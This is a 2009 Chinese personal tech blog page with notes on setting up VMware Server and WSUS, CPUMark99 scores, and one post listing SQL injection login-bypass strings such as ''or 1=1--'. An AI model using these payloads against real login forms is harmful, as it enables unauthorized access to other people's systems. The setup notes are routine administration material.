2009年10月13日 星期二

VMWare Server 2 For Linux 安裝筆記



在Linux安裝VMWare Server,

系統需要先安裝: (先切換到su,會比較沒有麻煩)
1.Linux kernel-devel 和 xintd
# yum install kernel-devel xinetd

如果在Ubuntu可以用: # sudo apt-get install linux-headers-'uname -r'
build-essential

2.gcc
# yum groupinstall "Development Libraries" "Development Tools"

# yum install gcc


切換到su
安裝VMServer的RPM檔 ( xxxx是版本 )
# rpm -Uhv VMware-server-xxxx.rpm

最後 要做設定
Run the configuration script:
# ./vmware-config.pl


裝好之後要注意Linux的防火牆設定!
要在iptables中將VM的http和https的port開啟!
1.可以使用CentOS中的setup指令,自訂接受的port。
2.到/etc/sysconfig/iptables這個檔案中去新增規則。
  規則如下:
  -A RH-Firewall-1-INPUT -m state --state NEW -m udp -p udp --dport 8222 -j
ACCEPT
  -A RH-Firewall-1-INPUT -m state --state NEW -m udp -p udp --dport 8333 -j
ACCEPT


=============================================
VIClient要登入時,
位址的部分,要從https的port去登入。
=============================================
關閉web服務,只用viclient。增加效能。

關閉WebAccess:
# service vmware-mgmt stop

寫入檔案:
# vi /etc/init.d/vmware
將檔案中的#vmware_start_webAccess這一行屏蔽掉(在最後一個段落)。(用井字號# )  (
修改/etc/init.d/vmware, 屏蔽: line 1202:)

If you want to turn off HTTP/HTTPS access completely (strangely, I didn't see
any reduction in memory usage when I did this), comment out the _entire_

<proxysvc> section in the file /etc/vmware/hostd/proxy.xml and restart hostd.

# service vmware-mgmt stop && service vmware-mgmt start

參考網址:
1.VMware Server 2 for Linux: HOW-TO Disable VMware Virtual Infrastructure Web
Access:

http://blog.netnerds.net/2009/01/vmware-server-2-for-linux-how-to-disable-vmware-virtual-infrastructure-web-access/
2.HOWTO: VMWare Server 2, Disable Web Server Interface:

http://www.linux.com/community/blogs/howto-vmware-server-2-disable-web-server-interface.html




張貼者: 1 則留言:
標籤: ,

2009年10月6日 星期二

SQL Injection Strings (帳密資安)



來源網站:http://www.governmentsecurity.org/forum/index.php?showtopic=344&st=0&#entry935


admin'--

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

hi' or 'a'='a

hi') or ('a'='a

hi") or ("a"="a


張貼者: 沒有留言:
標籤: ,

2009年10月5日 星期一

我的電腦的CPUMark99列表總整理


Celeron NorthWood 2.4G  + SOYO P4X400 DRAGON Ultra
CPUMark99 Score:92.3

Athlon XP 1800+ 1533MHz Palomino + Gigabyte 7vrx
CPUMark99 Score:142

Athlon XP 1800+ 1533MHz Thoroughbred + Gigabyte 7VM400M
CPUMark99 Score:132

Acer TravelMate 3211WXCi + Intel Pentium M 730  1.60GHz  Dothan
CPUMark99 Score:190

EeePC 701 + Celeron M ULV 353 900MHz in 630 MHz(70 MHz x 9)
CPUMark99 Score:66.8

EeePC 701 + Celeron M ULV 353 900MHz in 900MHz
CPUMark99 Score:101

(Intel Atom N270 CPUMark99 Score: 111 )

仁寶 JFT00 (Dell Vostro 1200) + Intel Mobile Core 2 Duo T7500 @ 2.20GHz
CPUMark99 Score:310

浩鑫 Shuttle XPC SS31T + Celeron E1400 @ 2.00GHz
CPUMark99 Score:249

精英EVCM-F + VIA C3 1.0G
CPUMark99 Score:63.3

Celeron 1G (P3等級) + Intel 815 Chipset 雜牌主機板
CPUMark99 Score:66.7


張貼者: 沒有留言:
標籤:

2009年9月16日 星期三

WSUS安裝筆記




系統需求:
1. Windows 2003 SP1以上 (最好SP2且完成所有更新)
2. IIS + ASP.Net
3. .Net Framwork 2.0 以上
4. Microsoft Report Viewer Redistributable (可轉散發報表檢視器)2005

如果裝的是WSUS 3.0 SP2,則可裝以下程式:
3. .Net Framwork 3.5 SP1
4. Microsoft Report Viewer 2008 SP1 Redistributable - 繁體中文


--------------------------------------------------------------------

需開放WSUS上的防火牆
將80和443port開放給內部區域網路。
這樣子其他電腦才找得到WSUS。


--------------------------------------------------------------------
沒有AD網域的客戶端電腦更新步驟整理:
1.到gpedit.msc裡面,[電腦設定]>[系統管理範本]>[Windows元件]>[Windows Update]
  [指定內部網路 Microsoft 更新服務的位置]
  [已啟用]
  [設定內部網路更新服務來偵測更新]=[設定內部網路統計數字伺服器]
   = http://(WSUS主機的IP或網址或主機名稱)

2.需開啟自動更新,可從gpedit.msc也可從系統內容設定。

3.重開自動更新服務,先停止再開啟。最後下指令讓電腦馬上連線更新。
  打開CMD命令提示字元:
  net stop wuauserv [Enter]
  net start wuauserv [Enter]
  wuauclt.exe /detectnow [Enter]


--------------------------------------------------------------------
如果還是沒辦法連上更新,要注意權限問題。看說明文件設定。
--------------------------------------------------------------------
--------------------------------------------------------------------
將用戶端電腦指向 WSUS 伺服器
1.  在 [群組原則物件編輯器] 中,依序展開 [電腦設定]、[系統管理範本] 和
 [Windows
元件],再按一下 [Windows Update]。
2.  在 [詳細資料] 窗格中,按兩下 [指定內部網路 Microsoft 更新服務的位置]。
3.  按一下 [已啟用],並在 [設定內部網路更新服務來偵測更新] 方塊及 [設定內部網

統計數字伺服器] 方塊中,輸入同一部 WSUS 伺服器的 HTTP URL。例如,兩個方
塊都輸入 http://servername,然後按一下 [確定]。



ps:設定好群組原則之後,客戶端更新的電腦需要重新啟動自動更新服務或是重開機。
   net stop wuauserv [Enter]  net start wuauserv [Enter]


手動初始化 WSUS 伺服器進行偵測
1.  在用戶端電腦上,按一下 [開始],再按一下 [執行]。
2.  在 [開啟] 方塊中輸入 cmd,然後按一下 [確定]。
3.  在命令提示字元下,輸入 wuauclt.exe /detectnow。這個命令列選項會指示自動更
新立刻連絡 WSUS 伺服器。





--------------------------------------------------------------------

http://groups.google.com.tw/group/microsoft.public.tw.windows.server/browse_thread/thread/2c05e0ced6ffdf71/3611ce19d0d40e37

1.     開啟 [命令提示字元],輸入下面的指令,以停止自動更新服務,並按下
[Enter]:
net stop wuauserv
2.     在 [命令提示字元],輸入下面的指令,以停止自動更新服務,並按下 [Enter]:

net start wuauserv
3.     輸入下列指令,並按下 [Enter]:wuauclt.exe /detectnow
4. 因 Client 與 Server 要相互交流一下,故請稍待 6 到 10 分鐘,理應可以在
Server 的管理網頁上看到 Client 向 Server 報到的資訊
(我用VM內的系統測試,是可以馬上找到的)



張貼者: 1 則留言:
標籤: ,
訂閱: 文章 (Atom)